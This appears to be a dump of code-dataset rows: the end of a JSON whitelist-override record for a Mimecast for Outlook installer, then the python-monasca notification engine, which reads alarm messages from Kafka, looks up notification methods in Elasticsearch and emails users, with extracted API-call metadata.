"override_type": "SHA256",
"override_list": "WHITE_LIST",
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124",
"filename": "mimecast for outlook 7.8.0.125 (x86).msi"
},
"workflow": {
"status": "ACCEPTED",
"ref_id": "e9410b754ea011ebbfd0db2585a41b07",
"changed_by": "[email protected]",
"create_time": "2021-05-18T16:37:07.000Z",
"update_time": "2021-08-31T15:13:40.000Z",
"comment": "Winter is coming"
},
"impact": {
"org_adoption": "MEDIUM",
"impacted_devices": 45,
"event_count": 79,
"impact_score": 0,
"update_time": "2021-05-18T16:37:07.000Z"
}
}
| [] |
TeamZenith/python-monasca | monasca/microservice/notification_engine.py | badc86fbe2c4424deb15b84eabd3248e899ef4ee | # Copyright 2015 Carnegie Mellon University
#
# Author: Han Chen <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import json
from oslo.config import cfg
from stevedore import driver
from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service
es_opts = [
cfg.StrOpt('topic',
default='alarm',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('topic2',
default='notification_methods',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('doc_type',
default='',
help=('The document type which defines what document '
'type the messages will be save into. If not '
'specified, then the topic will be used.')),
cfg.StrOpt('processor',
default='',
help=('The message processer to load to process the message.'
'If the message does not need to be process anyway,'
'leave the default')),
]
es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)
LOG = log.getLogger(__name__)
class NotificationEngine(os_service.Service):
def __init__(self, threads=1000):
super(NotificationEngine, self).__init__(threads)
self._kafka_conn = kafka_conn.KafkaConnection(
cfg.CONF.notification.topic)
# Use doc_type if it is defined.
if cfg.CONF.notification.doc_type:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.doc_type)
else:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.topic2)
def handle_alarm_msg(self, msg):
if msg and msg.message:
LOG.debug("Message received for alarm: " + msg.message.value)
value = msg.message.value
if value:
# value's format is:
# {
# "metrics": {
# "timestamp": 1432672915.409,
# "name": "biz",
# "value": 1500,
# "dimensions": {
# "key2": "value2",
# "key1": "value1"
# }
# },
# "state_updated_timestamp": 1432672915,
# "state": "ALARM",
# "alarm-definition": {
# "alarm_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "undetermined_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "name": "Average CPU percent greater than 10",
# "match_by": [
# "hostname"
# ],
# "description": "The average CPU percent is greater than 10",
# "ok_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
# and max(bar { asd = asd} )>1200 or avg(biz)>1300",
# "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
# "severity": "LOW"
# }
# }
# convert to dict, and get state to determine the actions(notification method id) needed.
# the method id can be used to match the notification method in elasticSearch
# Then an email will be sent (TODO: phone txt msg are not dealt with for now)
dict_msg = ast.literal_eval(value)
state = dict_msg["state"]
if state not in ["ALARM","OK","UNDETERMINED"]:
LOG.error("state of alarm is not defined as expected")
return
actions = []
if state == 'ALARM':
actions = dict_msg["alarm-definition"]["alarm_actions"]
if state == 'OK':
actions = dict_msg["alarm-definition"]["ok_actions"]
if state == 'UNDETERMINED':
actions = dict_msg["alarm-definition"]["undetermined_actions"]
addresses = []
types = []
# the action_id is an id of notification method
# there can be multiple ids in one alarm message with different types
for action_id in actions:
es_res = self._es_conn.get_message_by_id(action_id)
def _get_notification_method_response(res):
if res and res.status_code == 200:
obj = res.json()
if obj:
return obj.get('hits')
return None
else:
return None
es_res = _get_notification_method_response(es_res)
LOG.debug('Query to ElasticSearch returned: %s' % es_res)
if es_res is None:
LOG.error("The provided is not defined as expected")
return
name = es_res["hits"][0]["_source"]["name"]
type = es_res["hits"][0]["_source"]["type"]
address = es_res["hits"][0]["_source"]["address"]
types.append(type)
addresses.append(address)
email_addresses = []
for i in range(len(types)):
if types[i] == "EMAIL":
email_addresses.append(addresses[i])
email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"])
def start(self):
while True:
try:
for msg in self._kafka_conn.get_messages():
self.handle_alarm_msg(msg)
# if autocommit is set, this will be a no-op call.
self._kafka_conn.commit()
except Exception:
LOG.exception('Error occurred while handling kafka messages.')
def stop(self):
self._kafka_conn.close()
super(NotificationEngine, self).stop()
| [((53, 11, 53, 66), 'oslo.config.cfg.OptGroup', 'cfg.OptGroup', (), '', False, 'from oslo.config import cfg\n'), ((54, 0, 54, 33), 'oslo.config.cfg.CONF.register_group', 'cfg.CONF.register_group', ({(54, 24, 54, 32): 'es_group'}, {}), '(es_group)', False, 'from oslo.config import cfg\n'), ((55, 0, 55, 41), 'oslo.config.cfg.CONF.register_opts', 'cfg.CONF.register_opts', ({(55, 23, 55, 30): 'es_opts', (55, 32, 55, 40): 'es_group'}, {}), '(es_opts, es_group)', False, 'from oslo.config import cfg\n'), ((57, 6, 57, 29), 'monasca.openstack.common.log.getLogger', 'log.getLogger', ({(57, 20, 57, 28): '__name__'}, {}), '(__name__)', False, 'from monasca.openstack.common import log\n'), ((29, 4, 33, 42), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((35, 4, 39, 42), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((41, 4, 45, 64), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((46, 4, 50, 42), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((63, 27, 64, 40), 'monasca.common.kafka_conn.KafkaConnection', 'kafka_conn.KafkaConnection', ({(64, 12, 64, 39): 'cfg.CONF.notification.topic'}, {}), '(cfg.CONF.notification.topic)', False, 'from monasca.common import kafka_conn\n'), ((68, 28, 69, 47), 'monasca.common.es_conn.ESConnection', 'es_conn.ESConnection', ({(69, 16, 69, 46): 'cfg.CONF.notification.doc_type'}, {}), '(cfg.CONF.notification.doc_type)', False, 'from monasca.common import es_conn\n'), ((71, 28, 72, 45), 'monasca.common.es_conn.ESConnection', 'es_conn.ESConnection', ({(72, 16, 72, 44): 'cfg.CONF.notification.topic2'}, {}), '(cfg.CONF.notification.topic2)', False, 'from monasca.common import es_conn\n'), ((117, 27, 117, 50), 'ast.literal_eval', 'ast.literal_eval', ({(117, 44, 117, 49): 'value'}, {}), '(value)', False, 'import ast\n'), ((168, 16, 168, 119), 'monasca.common.email_sender.send_emails', 'email_sender.send_emails', ({(168, 41, 168, 56): 'email_addresses', (168, 58, 168, 73): '"""Alarm to User"""', (168, 75, 168, 118): "dict_msg['alarm-definition']['description']"}, {}), "(email_addresses, 'Alarm to User', dict_msg[\n 'alarm-definition']['description'])", False, 'from monasca.common import email_sender\n')] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.